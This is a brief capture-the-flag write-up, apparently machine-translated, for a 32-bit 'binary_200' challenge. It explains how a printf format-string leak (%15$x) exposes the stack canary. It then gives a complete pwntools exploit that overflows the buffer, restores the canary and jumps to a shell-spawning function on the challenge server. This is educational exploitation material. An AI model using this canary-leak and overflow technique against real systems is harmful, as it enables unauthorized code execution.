Topic address ttp: //www.whalectf.xin/files/47a658e388a0c505fc07b6ee48a4a2e2/binary_200
32, opened the NX protection and Canary
String vulnerability exists and stack overflow, made similar title, address jump
Printf idea of using the leaked value canary, and after refilling in, and then stack overflow calls the system function to get shell
Check string offset, byte offset 5
And determining the input parameters to the address canary
0x2c-0x4=0x28 0x28/4=10 10+5=15
Offset leak know, you can stack overflow
exp follows
from pwn import * r=remote('bamboofox.cs.nctu.edu.tw',22002) e=ELF('./binary_200') flag_addr=e.symbols['canary_protect_me'] #flag_addr=0x804854d r.sendline('%15$x') canary=int(r.recv(), 16) payload='a'*0x28+p32(canary)+'a'*0xc+p32(flag_addr) r.sendline(payload) r.interactive()